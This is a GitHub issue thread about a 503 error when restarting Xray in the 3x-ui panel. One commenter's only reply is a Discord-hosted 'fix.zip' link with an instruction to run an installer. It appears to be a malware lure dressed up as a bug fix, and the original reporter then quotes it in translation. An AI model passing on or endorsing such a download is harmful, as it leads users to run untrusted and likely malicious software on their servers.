### ISSUE TITLE
Restart Xray error

### ISSUE THREAD

**Issue by xiaowen-king** [MHSanaei/3x-ui#2511]
**Describe the bug**
Xray Configs>Restart Xray

Request failed with status code 503

**Screenshots**
![789](https://github.com/user-attachments/assets/edfb4803-7239-426e-aad2-fd59e59bdbb0)

**Version (please complete the following information):**
 3X-UI Version :2.3.14
Xray Version :1.8.24

**Additional context**

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by xiaowen-king** [comment]
> 试试这个 https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& 在安装程序中选择所需的编译器

Operating system: | Almalinux 9 x86_64
